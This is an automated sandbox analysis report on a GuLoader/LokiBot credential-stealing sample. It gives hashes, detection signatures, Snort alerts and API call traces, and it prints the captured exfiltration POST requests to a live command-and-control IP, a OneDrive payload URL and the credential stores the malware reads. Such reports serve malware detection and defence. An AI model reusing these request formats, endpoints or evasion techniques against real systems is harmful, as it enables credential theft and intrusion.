Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Trojan.KillProc2.11384.14756.28239

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.KillProc2.11384.14756.28239 (renamed file extension from 28239 to exe)
Analysis ID:271623
MD5:1b96d90654b270e8c87f50599ef89ced
SHA1:8fb7a9bf0b533e2f79a0f9e2c345fbfeb391207a
SHA256:7c3b056caf85497f39a72bcdde137abc70b81612496a358a8627fd4994f84203

Most interesting Screenshot:

Detection

GuLoader
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Tries to detect Any.run
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.1318395857.0000000000560000.00000040.00000001.sdmpJoeSecurity_GuLoaderYara detected GuLoaderJoe Security
    Process Memory Space: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe PID: 7032JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
      Process Memory Space: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe PID: 7032JoeSecurity_GuLoaderYara detected GuLoaderJoe Security
        Process Memory Space: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe PID: 7008JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
          Process Memory Space: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe PID: 7008JoeSecurity_GuLoaderYara detected GuLoaderJoe Security

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49745 -> 195.69.140.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49745 -> 195.69.140.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49745 -> 195.69.140.147:80
            Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49745 -> 195.69.140.147:80
            Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49748 -> 195.69.140.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49748 -> 195.69.140.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49748 -> 195.69.140.147:80
            Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49748 -> 195.69.140.147:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49749 -> 195.69.140.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49749 -> 195.69.140.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49749 -> 195.69.140.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49749 -> 195.69.140.147:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49750 -> 195.69.140.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49750 -> 195.69.140.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49750 -> 195.69.140.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49750 -> 195.69.140.147:80
            Source: global trafficHTTP traffic detected: POST /.op/cr.php/u1DEZ4oVQPK3w HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 195.69.140.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DC3240A4Content-Length: 192Connection: close
            Source: global trafficHTTP traffic detected: POST /.op/cr.php/u1DEZ4oVQPK3w HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 195.69.140.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DC3240A4Content-Length: 192Connection: close
            Source: global trafficHTTP traffic detected: POST /.op/cr.php/u1DEZ4oVQPK3w HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 195.69.140.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DC3240A4Content-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /.op/cr.php/u1DEZ4oVQPK3w HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 195.69.140.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DC3240A4Content-Length: 165Connection: close
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
            Source: unknownDNS traffic detected: queries for: onedrive.live.com
            Source: unknownHTTP traffic detected: POST /.op/cr.php/u1DEZ4oVQPK3w HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 195.69.140.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: DC3240A4Content-Length: 192Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Aug 2020 04:56:16 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318649331.0000000000A65000.00000004.00000020.sdmpString found in binary or memory: http://195.69.140.147/.op/cr.php/u1DEZ4oVQPK3w
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318649331.0000000000A65000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318649331.0000000000A65000.00000004.00000020.sdmpString found in binary or memory: http://microsoft.co
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318649331.0000000000A65000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318649331.0000000000A65000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.msocsp.com0
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318589782.0000000000A3D000.00000004.00000020.sdmpString found in binary or memory: https://6jp6pa.db.files.1drv.com/
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318649331.0000000000A65000.00000004.00000020.sdmp, SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318634748.0000000000A51000.00000004.00000020.sdmpString found in binary or memory: https://6jp6pa.db.files.1drv.com/y4mCwDL05cLjQD9_913AuqWJRHEZNn6rT7db90thaxk-i8hb07krQkDncEPj8iX348N
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318589782.0000000000A3D000.00000004.00000020.sdmpString found in binary or memory: https://6jp6pa.db.files.1drv.com/~/
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318548075.00000000009F8000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318548075.00000000009F8000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/Lk
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318395857.0000000000560000.00000040.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=CEA27E82624AB94F&resid=CEA27E82624AB94F%21198&authkey=AGHwbcF
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318649331.0000000000A65000.00000004.00000020.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B788DA NtResumeThread,0_2_02B788DA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B77CC0 NtWriteVirtualMemory,0_2_02B77CC0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B7847B NtProtectVirtualMemory,0_2_02B7847B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B70727 EnumWindows,NtSetInformationThread,TerminateProcess,0_2_02B70727
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B74319 NtSetInformationThread,TerminateProcess,0_2_02B74319
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B734FF NtWriteVirtualMemory,0_2_02B734FF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B78AFB NtResumeThread,0_2_02B78AFB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B788E3 NtResumeThread,0_2_02B788E3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B732C2 NtWriteVirtualMemory,0_2_02B732C2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B73035 NtWriteVirtualMemory,0_2_02B73035
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B7883D NtProtectVirtualMemory,0_2_02B7883D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B78C03 NtResumeThread,0_2_02B78C03
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B77273 NtSetInformationThread,TerminateProcess,0_2_02B77273
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B78E43 NtResumeThread,0_2_02B78E43
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B729BA NtWriteVirtualMemory,0_2_02B729BA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B70793 NtSetInformationThread,TerminateProcess,0_2_02B70793
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B78FE7 NtResumeThread,0_2_02B78FE7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B789EB NtResumeThread,0_2_02B789EB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B78D17 NtResumeThread,0_2_02B78D17
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B70762 NtSetInformationThread,TerminateProcess,0_2_02B70762
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B7336B NtWriteVirtualMemory,0_2_02B7336B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B7475E NtSetInformationThread,TerminateProcess,LoadLibraryA,0_2_02B7475E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_0056847B NtProtectVirtualMemory,1_2_0056847B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_00562C78 LdrInitializeThunk,RtlAddVectoredExceptionHandler,LdrInitializeThunk,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,1_2_00562C78
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_005688DA NtSetInformationThread,1_2_005688DA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_00562B4A CreateThread,TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,1_2_00562B4A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_00563B6B Sleep,LdrInitializeThunk,NtProtectVirtualMemory,1_2_00563B6B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_00564319 NtSetInformationThread,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,InternetOpenA,LdrInitializeThunk,InternetOpenUrlA,1_2_00564319
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_00560727 EnumWindows,NtSetInformationThread,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,1_2_00560727
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_00563DE3 LdrInitializeThunk,NtProtectVirtualMemory,1_2_00563DE3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_00568E43 NtSetInformationThread,1_2_00568E43
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_00567273 NtSetInformationThread,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,1_2_00567273
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_00568C03 NtSetInformationThread,1_2_00568C03
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_0056883D NtProtectVirtualMemory,1_2_0056883D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_00568AFB NtSetInformationThread,1_2_00568AFB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_00563CE3 LdrInitializeThunk,NtProtectVirtualMemory,1_2_00563CE3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_005688E3 NtSetInformationThread,1_2_005688E3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_00562CB9 LdrInitializeThunk,NtProtectVirtualMemory,1_2_00562CB9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_00560F74 LdrInitializeThunk,NtProtectVirtualMemory,1_2_00560F74
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_00560762 NtSetInformationThread,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,1_2_00560762
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_00560F6F LdrInitializeThunk,NtProtectVirtualMemory,1_2_00560F6F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_00568D17 NtSetInformationThread,1_2_00568D17
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_00568FE7 NtSetInformationThread,1_2_00568FE7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_005689EB NtSetInformationThread,1_2_005689EB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_00560793 NtSetInformationThread,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,1_2_00560793
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_00403B720_2_00403B72
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_0040B3970_2_0040B397
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000000.00000002.1288539224.00000000021B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000000.00000000.1270369826.0000000000413000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSUCH.exe vs SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1321486691.000000001DC30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000000.1286898517.0000000000413000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSUCH.exe vs SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1321501141.000000001DD80000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeBinary or memory string: OriginalFilenameSUCH.exe vs SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe
            Source: classification engineClassification label: mal84.troj.spyw.evad.winEXE@3/2@2/1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeFile created: C:\Users\user\AppData\Local\Temp\~DF715A8C476E9ECCE9.TMPJump to behavior
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe'
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe'
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe' Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000001.00000002.1318395857.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe PID: 7032, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe PID: 7008, type: MEMORY
            Yara detected VB6 Downloader GenericShow sources
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe PID: 7032, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe PID: 7008, type: MEMORY
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_00407ECB push ebx; iretd 0_2_00407ED2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_004084F0 push ss; iretd 0_2_004084FE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_004058FC push esp; ret 0_2_004058FF
